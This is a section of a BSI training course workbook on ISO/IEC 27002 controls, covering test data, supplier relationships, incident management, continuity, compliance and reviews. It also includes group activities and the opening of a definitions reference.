…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
98
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
14.3 Test data
Objective: To ensure the protection of data used for testing
14.3.1 Protection of test data
Test data should be selected carefully, protected and controlled.
Test data should be selected carefully, protected and controlled, irrespective of its ownership, source
or origin.
The use of operational data containing personally identifiable information (PII) or any other
confidential information for testing purposes should be avoided wherever possible. If PII or otherwise
confidential information is used for testing purposes, all sensitive details and content should be
protected by removal or modification (see ISO/IEC 29101[26]).
Appropriate access control procedures should apply to test application systems and should reflect the
classification and sensitivity of test data and there should be separate authorization each time
operational information is copied to a test environment. The copying and use of operational
information should be logged to provide an audit trail.
Operational information should be erased from a test environment immediately after the testing is
complete.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
99
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
15.1 Information security in supplier relationships
Objective: To ensure protection of the organization’s assets that is accessible by suppliers.
Many organizations use suppliers or other third parties (e.g. for sales and distribution) to achieve
business objectives and the outsourcing of previously internal processes is now common place. In
such an environment, information is being directly shared with third parties and/or they may have
access to networks and systems which store or transport such information. The information security
risks arising from the use of suppliers and other third parties need to be understood and appropriate
responses to the identified risks applied.
15.1.1 Information security policy for supplier relationships
Information security requirements for mitigating the risks associated with supplier’s access to the
organization’s assets should be agreed with the supplier and documented
Once the risks associated with the use of third parties are understood, controls need to be identified,
agreed with each supplier (different suppliers may represent different risks and so the controls
selected may not always be the same) and documented within a policy to ensure consistency.
Organizations should ensure they identify the types of suppliers that are likely to have access to their
information and manage the relationship across the lifecycle, from identifying the need for a
supplier’s service or product commodity through due diligence and contracting, transition, business as
usual, change and exit. Through the lifecycle, a number of further controls are applied such as
providing awareness training to the supplier’s staff on information security requirements of the
organization, and performing control assurance and testing activities on the supplier’s adherence to
policies.
15.1.2 Addressing security within supplier agreements
All relevant information security requirements should be established and agreed with each supplier
that may access, process, store, communicate, or provide IT infrastructure components for, the
organization’s information.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
100
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Depending on the nature of the service or product procured and the relative negotiating strengths of
customer and supplier, the nature of the agreement to procure services can vary from a simple
purchase order with standardized (and often shortened) terms and conditions to master service
agreements (MSAs) with multiple services being delivered by a supplier to different parts of an
organization. It is also common that services may be procured on (negotiated) supplier terms,
especially cloud services. In this context, it is important that the organization’s interests are protected
and clear requirements are documented for inclusion in the agreement. Many organizations look to
ensure that the type of agreement chosen reflects the risk to the organization, e.g. services involving
personally identifiable information are not procured via a purchase order as the terms are
insufficiently detailed. In addition to requiring compliance with the organization’s information security
requirements, contract clauses and schedules will typically consider:
• Rights to audit
• Rights to agree selection and changes to subcontractors
• Rights to approve changes in service delivery model (e.g. supplier may want to move service
delivery offshore)
• Incident disclosure and support
• Legal and regulatory requirements
• Return and disposal of data at exit
15.1.3 Information and communication technology supply chain
Agreements with suppliers should include requirements to address the information security risks
associated with information and communications technology services and product supply chain.
Issues can often originate from deeper in the supply chain than the immediate supplier with which
the organization holds a contractual relationship. There is a specific need to consider information and
communication technology supply chains where hardware and software products may carry
vulnerabilities or lose manufacturer support, if not well managed. This also applies to Cloud services
where the supply chain may be four or five layers deep. Therefore, it is important to map out key
supply chains and identify product and service components and the risk presented. The tier one
supplier needs to be held to account for the security of its supply chain. For high risk supply chains,
the right to audit supply chain participants directly is worth considering.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
101
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
15.2 Supplier service delivery management
Objective: To maintain an agreed level of information security and service delivery in line with supplier
agreements.
15.2.1 Monitoring and review of supplier services
Organizations should regularly monitor, review and audit supplier service delivery.
Monitoring and review of supplier service delivery is common practice from a performance against service
level agreements perspective. This monitoring needs to include information security requirements as well.
Building information security reviews into existing operational and commercial governance helps to drive an
integrated approach towards the supplier and ensure top management awareness and engagement in risks
and issues arising from non-performance. Security incidents, audit reports (independent and internal)
should be used to inform a view of control effectiveness.
15.2.2 Managing changes to supplier services
Changes to the provision of services by suppliers, including maintaining and improving existing information
security policies, procedures and controls, should be managed, taking account of the criticality of business
information, systems and processes involved and re-assessment of risks.
Changes in aspects of the service or product commodity supplied during the term of the agreement with a
supplier are quite common. Change may be initiated by the supplier or the organization. It is important that
at the point of identifying a need to change, that the information security requirements are reviewed for
adequacy and modified as appropriate before the change is implemented to avoid exposing the organization
to unacceptable risks. Typical changes to consider include:
• Change to the physical location of service facilities
• Change in subcontractor
• Additional, new services being awarded to the supplier
• Introduction of new systems to support delivery of the service
• New regulatory requirements
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
102
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 8: Supplier relationships
Purpose: Create a supplier risk questionnaire.
Duration:
25 minutes in groups
15 minutes feedback and discussion
Directions:
ABC Organization Ltd has identified that it does not know what level of information security risk it is
exposed to through the procurement of various goods and services from third parties. As such, it has
decided to conduct risk assessments on all its current third party suppliers. As a first step, it has
decided to send a high-level information security questionnaire to all of its suppliers.
On a flipchart, devise ten questions that could be used to provide a high level assessment of the level
of risk posed by the suppliers of goods and services to ABC Organization Ltd.
Be prepared to explain the purpose and benefits of your questions.
The tutor will then lead a discussion regarding the questions the groups have produced and why they
are felt to be important from an information security perspective.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
103
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
16.1 Management of information security incidents and improvements
Objective: To ensure a consistent and effective approach to the management of information security
incidents, including communication on security events and weaknesses.
Information security incidents can bring significant disruption to business operations and harm the
reputation of the organization. Developing the capability to consistently and effectively detect, report,
assess, respond to, deal with and learn from information security incidents is therefore essential.
16.1.1 Responsibilities and procedures
Management responsibilities and procedures should be established to ensure a quick, effective and
orderly response to information security incidents.
Effective response requires management to understand its role and responsibilities in leading the
incident management team. A number of procedures need to be established and validated in advance
to provide assurance of likely effectiveness of any response These procedures should cover the
following:
• Incident response planning and preparation
• Monitoring, detecting analysing and reporting of information security events and incidents
• Logging of incident management activities
• Handling of forensic evidence
• Assessment of and decision on information security events and assessment of information security
weaknesses
• Response including for escalation, controlled recovery from an incident and communication to
internal and external people or organizations
• Reporting procedures
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
104
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
16.1.2 Reporting information security events
Information security events should be reported through appropriate management channels as quickly
as possible.
Once the reporting procedures are agreed and signed-off, then employees and contractors need to
be made aware of their responsibility to report information security events as quickly as possible and
to the right channel. Information security events have been defined in ISO 27000 as:
‘…identified occurrence of a system, service or network state indicating a possible breach of
information security policy or failure of safeguards, or a previously unknown situation that may be
security relevant’ (ISO 27000:2012, Clause 2.31)
Example events include observation of ineffective security controls, breaches of information
availability expectations, access violations or malfunctions of software.
16.1.3 Reporting information security weaknesses
Reporting information security weaknesses
Where employees or contractors identify an information security weakness then this should be
recorded and reported through the correct channels as identified in the procedures for reporting.
Employees and contractors should resist any temptation to confirm the weakness by taking any
unilateral action and this should be made clear in the procedures and in the communication around
the procedures.
16.1.4 Assessment of and decision on information security events
Information security events should be assessed and it should be decided if they are to be classified as
information security incidents.
A reported information security event needs to be assessed against an agreed set of criteria to
determine whether it should be classified as an incident and an appropriate level of priority assigned.
The classification and priority assigned reflect the likely impact and velocity of the incident.
16.1.5 Response to information security incidents
Information security incidents should be responded to in accordance with the documented
procedures.
The response to the information security incident is built around the need to resume expected
security levels within target timeframes to prevent further harm. A recovery phase will follow, e.g.
cleaning of infected systems, restoring of backups to clean production systems etc.
The response needs to ensure that the right people are brought together, including suppliers that
may be providing managed security services, for example, as part of the incident management team.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
105
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
In addition to procedures to deal with the information security weaknesses found to cause or
contribute to the incident, there are a number steps need to be included within response procedures:
• Collection of evidence as soon as possible after the incident is confirmed
• Escalation procedures to more senior levels of management depending on the expected impact of
the incident and need for external communication and stakeholder management
• Communicating the existence of the incident to external people of organizations with a need to
know, e.g. regulators, customers
• Once the incident has been successfully addressed, logged and the incident team stood down, it is
necessary to perform post incident analysis to identify the root cause(s) of the incident
16.1.6 Learning from information security incidents
Knowledge gained from analysing and resolving information security incidents should be used to
reduce the likelihood or impact of future incidents.
Post incident analysis provides the organization with a learning opportunity to reduce the likelihood or
impact of the incident re-occurring. It is important the analysis includes assessment of internal and
external costs as well as reputational impact and any fines arising from compliance breaches. The
consequences of some incidents may take time to become obvious, e.g. loss of sales at contract
renewal. These evaluations provide the business case for appropriate investments to mitigate future
similar events. Additionally, they can be used as internal case studies to raise awareness of the
incidents that may arise if staff and contractors do not follow procedures or the organization fails in
its incident response.
16.1.7 Collection of evidence
The organization should define and apply procedures for the identification, collection, acquisition and
preservation of information, which can serve as evidence.
As with any good police drama, the timely and safe collection of evidence is key to successful analysis
of incidents and may be required in the event of an eventual prosecution. Procedures need to be
defined that support the processes of identification, collection, acquisition and preservation of
evidence considering factors such as chain of custody, safety and competency of personnel and
documentation.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
106
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
17.1 Information security continuity
Objective: Information security continuity should be embedded in the organization’s business
continuity management systems.
Business continuity is defined in ISO/IEC 22301:2012 as the capability of the organization to continue
delivery of products or services at acceptable predefined levels following a disruptive incident. In the
context of continuity of information security this means identifying the time-criticality of information
security controls to determine the priority of their recovery when the organization is affected by a
disruptive incident. The risk is that in times of crisis and stress, workaround procedures and ‘short
cuts’ may come into effect which may mean that required controls are not fully applied without
appropriate governance.
In organizations such as retail banks, information security management controls may have ‘always
on’ requirements to match the nature of 24x7x365 online banking requirements, while requirements
at branches may only need to align with opening hours at the branch.
17.1.1 Planning information security continuity
The organization should determine its requirements for information security and the continuity of
information security management in adverse situations, e.g. during a crisis or disaster.
Where an organization has an existing business continuity management system (BCMS) then
information security continuity requirements should be documented as part of the business impact
analysis phase and become an integrated part of the management system. Where organizations do
not have a BCMS, then a business impact analysis should be completed and availability requirements
determined for specified controls. In some organizations, the IT Disaster Recovery Plans could be
extended to cover information security management continuity. It should also be noted that during
certain incidents, confidentiality and integrity related controls may be overlooked (e.g. unauthorized
access may be gained because fire doors are open). Organizations should consider these types of
weaknesses when planning
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
107
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
business continuity processes and include suitable mitigating controls within the plans where
necessary (the organization should determine the degree to which it is prepared to accept the
heightened levels of risk presented by such weaknesses and agree controls accordingly).
17.1.2 Implementing information security continuity
The organization should establish, document, implement and maintain processes, procedures and
controls to ensure the required level of continuity for information security during an adverse situation.
As with security incident management (16.1.5), business continuity management sets out procedures
for effective response to disruptive incidents across a wide range of potential incident scenarios and
mandates that documented plans, response and recovery procedures are developed and approved,
These plans and procedures detail how the organization will manage a disruptive event and maintain
its information security to a predetermined level agreed with top management. As part of continuity
planning, the organization should consider its options when existing information security controls
cannot be maintained and alternative controls need to be applied until recovery is effected.
17.1.3 Verify, review and evaluate information security continuity
The organization should verify the established and implemented information security continuity
controls at regular intervals in order to ensure that they are valid and effective during adverse
situations.
Plans can provide a false sense of assurance unless they have been tested and regularly reviewed
and updated to reflect the organization and its requirements. Whether the information security
management plans are standalone or part of wider business continuity and IT Disaster Recovery
plans, there is a need to test the plans through exercising to ensure they are likely to be effective.
Exercises can range from discussion-based plan walkthroughs and scenario-driven workshops
through to live exercises.
Organizations are subject to change and new controls may be required while older ones are retired,
so it is necessary to update business impact analysis and review plans for currency.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
108
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
17.2 Redundancies
Objective: To ensure availability of information processing facilities.
17.2.1 Availability of information processing facilities
Information processing facilities should be implemented with redundancy sufficient to meet
availability requirements.
In addition to considering the availability of information security controls, business continuity
requirements apply to protecting the availability of information systems. Based on the availability
requirements identified through business impact analysis, technical and architectural options will be
considered to maintain required availability levels. Introducing redundancy is seen as an effective
response to secure high availability but introduces additional cost. Testing of redundancy, e.g. failover of live to back-up needs to be part of the validation of continuity arrangements but needs to be
carefully managed to avoid disruption to the business.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
109
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 9: Incident management
Purpose: To analyse the nature, impact and response to an information security incident
Duration:
30 minutes in groups
10 minutes feedback
Directions:
The IT Operations Manager has received a telephone call from a member of the public who claims to
have bought a laptop from an online auction site and that the laptop belongs to ABC Organization.
This has been determined through an asset tag located on the bottom of the laptop and when the
laptop is booted, the screensaver shows the ABC company logo and the local folders seem to have a
number of documents within them that could possibly be confidential. The caller has agreed to return
the laptop to ABC in return for reimbursement of what he paid for the laptop.
The standard business process for disposal of assets requires that a specialist third party is used to
either repurpose viable devices or destroy non-viable ones. Viable devices are required to have harddrives securely wiped before being disposed of.
The class will be split into three groups and the tutor will facilitate a discussion whereby each group
will take it in turn to decide the order of events in order to address the following:
• Determining how the incident occurred in the first place
• Determining the impact of the incident and what steps can be taken to minimise any adverse
consequences
• Determining what can be done to ensure the incident cannot happen again
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
110
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
18.1 Compliance with legal and contractual requirements
Objective: To avoid breaches of legal, statutory, regulatory or contractual obligations related to
information security and of any security requirements.
18.1.1 Identification of applicable legislation and contractual requirements
All relevant legislative statutory, regulatory, contractual requirements and the organization’s approach
to meet these requirements should be explicitly identified, documented and kept up to date for each
information system and the organization.
Organizations should ensure that they identify the legislation with which they need to comply and
also identify and implement the related controls required to enable such compliance. These controls
and their associated responsibilities should be formally documented. It is also important for those
organizations that operate internationally to ensure that it identifies and complies with all applicable
legislation within all of the jurisdictions within which it operates. Those organizations that are subject
to industry and other related regulation should similarly identify them and implement the related
controls (again internationally if appropriate). One area which tends to get overlooked is related to
contractual requirements. Many organizations simply don’t know if they have obligations to provide
certain levels of protection for certain types of information or for other specific controls to be
implemented based on the contractual requirements of customers and other third parties. Processes
should be implemented to ensure that all information security controls required by contract are
identified, no matter who within the organization is authorized to enter into such contracts.
18.1.2 Intellectual property rights
Appropriate procedures should be implemented to ensure compliance with legislative, regulatory and
contractual requirements related to intellectual property rights and use of proprietary software
products.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
111
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
In lots of jurisdictions around the world, intellectual property is protected by legislation and so this
should be identified and complied with inline with the requirements outlined in 18.1.1 above. There
may also be regulatory and contractual reasons for doing so. There are lots of opportunities within
many organizations to be non-compliant with this legislation or with contractual or regulatory
requirements as the IP of others is so easy to come across, for example when sourcing images to use
in a slideshow presentation by using internet search engines or through photocopying magazine
articles and other publications for use within projects or through the use of proprietary software
which may need a license to be used, especially within a commercial environment.
Organizations should ensure that suitable procedures are implemented for the use of such materials
based on a documented policy which clearly sets out when, where and how such material can be
used. Many organizations inadvertently become non-compliant simply because they obtain material
from sources that are untrustworthy. Processes should be implemented to ensure that images, music,
video, software and other proprietary material is sourced from reputable vendors so that any license
fees are determined and paid. Organizations should ensure they maintain an inventory of such
material and how many users are using it so that it can, if necessary, evidence the fact that it has
sufficient license to use the material. Reviews should be regularly conducted to ensure that no
unauthorized copies of such material exists. Procedures should be in place to ensure that where
unauthorized software or other material is identified, the appropriate license is obtained or the
material removed. Links should also be made between the documented policy and the organization’s
disciplinary process so that offenders can be dealt with as copyright infringement can lead to legal
action which may result in fines for the organization and even in some cases criminal proceedings.
The importance of protecting intellectual property associated responsibilities should be communicated
effectively to all persons doing work under control of the organization.
18.1.3 Protection of records
Records should be protected from loss, destruction, falsification, unauthorized access and
unauthorized release, in accordance with legislatory, regulatory, contractual and business
requirements.
Organizations will generate lots of different records for lots of different business processes. These
records should be categorized into different record types such as transaction logs, database records,
accounting records, audit logs etc. The importance of these different records should be determined
and suitable controls put in place to protect them. Records should be classified inline with the
organization’s information classification scheme to enable appropriate controls to be selected. Rules
should be determined for records with different classifications and should include retention periods,
upon what type of media the record should be stored. Suitable controls should be implemented to
ensure that no matter what the retention period defined and what storage media selected, the
records are not subject to deterioration so that they can still be relied upon as evidence when
needed. Storage and handling requirements, especially those determined by manufacturers of media
should therefore be adhered to. Consideration should specifically be given where the storage medium
is electronic to ensure that changes in technology do not lead to the information eventually being
irretrievable due the media no longer being supported.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
112
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
A retention schedule should be drawn up to ensure that records are only retained for the permissible
amount of time and an inventory of where the records are held should also be drawn up to enable
easy and timely access.
18.1.4 Privacy and protection of personally identifiable information
Privacy and protection of personally identifiable information should be ensured as required in relevant
legislation and regulation where applicable.
Organizations should develop policy to specifically detail how personal information should be
protected. The policy should be documented and communicated to all those under the control of the
organization to ensure that personal information of individuals is protected. The policy should be
developed taking into account the related legislation in place within the jurisdictions the organization
operates and should also take into account any related regulations and contractual requirements.
Once these requirements are understood, appropriate procedural and technical measures should be
implemented to ensure that the organization is able to comply with the documented policy. Where
necessary and especially in large and/or complex organizations specific responsibility should be given
to an individual e.g. a data protection officer for the protection of personal information. Such an
individual should be knowledgeable enough to provide advice to the organization related to suitable
levels of protection to put in place. The impacts on the organization related to non-compliance with
data protection related regulations can be significant including substantial fines and criminal
prosecutions.
18.1.5 Regulation of cryptographic controls
Cryptographic controls should be used in compliance with all relevant agreements, legislation and
regulations.
Where organizations use or intend to use cryptographic technology to provide confidentiality and
integrity protection, they should be aware of any limitations associated with its use as posed by local
legislation or through regulations or contractual requirements. A policy on the use of cryptographic
controls (see Clause 10) should be developed and implemented based in part of these limitations. In
particular, attention should be paid to any restrictions in place on the import and export of
cryptographic software and hardware into and out of the jurisdictions within which the organization
operates as well as how the technology is used and what it is being used to protect. In some
jurisdictions, legislation provides for access to materials by the authorities which is protected by
encryption and so suitable processes should be implemented to ensure that these requirements can
be adhered to.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
113
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
18.2 Information security reviews
Objective: To ensure that information security is implemented and operated in accordance with the
organizational policies and procedures.
18.2.1 Independent review of information security
The organization’s approach to managing information security and its implementation (i.e. control
objectives, controls, policies, processes and procedures for information security) should be reviewed
independently at planned intervals or when significant changes occur.
The organization’s management needs to ensure that it is in a position to determine if its approach to
managing information security is adequate and performing as expected. Consequently it is important
for reviews to be undertaken at regular intervals to test the approach. The reviews should be suitably
structured and should be conducted by someone independent of the area under review e.g. through
the use of an internal audit function, managers from other areas of the business or through the use
of third parties. Particular attention should be paid during the reviews which are not meeting the
intention of a particular control whether that be through use of an International Standard such as ISO
27001 or the organization’s own policies. Any non-conformance with requirements should be reported
to management who should use to information to determine suitable courses of corrective action if
necessary and also to determine the need for continual improvement of the effectiveness of the
information security management system.
18.2.2 Compliance with security policies and standards
Managers should regularly review the compliance of information processing and procedures within
their area of responsibility with the appropriate security policies, standards and any other security
requirements.
Management at various levels throughout the organization should ensure that standards and policy
requirements are being met in their areas of responsibility and that processes and procedures are
being adhered to. Managers should determine how these measurements are
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
114
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
to be made and what tools are required to perform them. Within their areas of responsibility,
managers should also ensure where a non-conformance is discovered that root cause analysis is
undertaken to determine the underlying cause. Once the cause has been determined, suitable
corrective action should be implemented, with reviews of the action taken being conducted to
determine effectiveness. Records of the reviews of any corrective action undertaken should be kept
and periodically reported to management.
18.2.3 Technical compliance review
Information systems should be regularly reviewed for compliance with the organization’s information
security policies and standards.
As well as compliance with policies and standards (18.2.2), the organization should ensure that any
technical controls that have been deployed are also working effectively. Usually the most effective
way of doing this is through the use of automated tools, but manual processes can be sometimes
equally effective. The organization should determine and implement the appropriate review based on
the degree of assurance required by the organization that the controls are effective. To ensure that
operating platforms and applications do no present unnecessary risk to the organization, the use of
vulnerability scanning and penetration testing should be considered. Care should be taken when
undertaking such testing that the testing itself does not cause unnecessary risk to the environment
being tested and so such testing should be change managed as appropriate and conducted in such a
way that disruption is kept to minimum.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
115
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 10: Pop quiz covering the whole two days
Purpose: Demonstrate understanding of terminology, clauses and controls from ISO/IEC 27002.
Duration:
30 minutes
Directions:
The class will be split into two groups. The tutor will read out a question to different members of
each group in turn. A point is scored for each correct answer and the score will be kept by the tutor
on the flipchart.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
116
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
The learning objectives identified at the beginning of the course were:
Explain:
• The background and purpose of ISO/IEC 27002
• The scope and structure of ISO/IEC 27002
• The different best practice controls recommended by ISO/IEC 27002
• The benefits of implementing the controls from ISO/IEC 27002
• Evaluate how to use the controls in conjunction with an ISO/IEC 27001 based ISMS
• Demonstrate how to choose the appropriate controls relevant to you
• Demonstrate how to implement chosen controls from ISO/IEC 27002
Have your particular expectations/questions been answered?
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
117
References
References
This document contains typical activity solutions and additional information referred to
during the course.
Table of contents
Activity 1: Information security related terms and definitions ............................................. 2
Activity 2: Information security policy ............................................................................... 4
Activity 3: Organization of information security ................................................................. 8
Activity 4: Human resource security ................................................................................. 9
Activity 5: Asset management ....................................................................................... 10
Activity 6: Access control .............................................................................................. 12
Day one refresher quiz.................................................................................................. 13
Activity 7: Change management .................................................................................... 15
Activity 8: Supplier relationships .................................................................................... 18
Activity 9: Incident management ................................................................................... 19
Activity 10: Pop quiz ..................................................................................................... 20
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
1 of 22
References
Activity 1: Information security related terms and definitions
Policy
Term
Process
Procedure
Control
Asset
Access control
Asset value
Authentication
Confidentiality
Integrity
Availability
Threat
Vulnerability
Likelihood
Risk
ISM02101ENGX v2.0 Nov 2017
Definition
A course or principle of action adopted or
proposed by an organization
An action or set of related actions that turn
an input into an output
A set of steps which describe how to
undertake a process
A measure introduced to modify the value
of a risk by changing the impact or
likelihood of its occurrence
Something of value
A way of limiting access to information and
systems to only those individuals who are
authorised to have access
The value of an asset to an organization
measured in business terms based on the
impact on the organization if the asset were
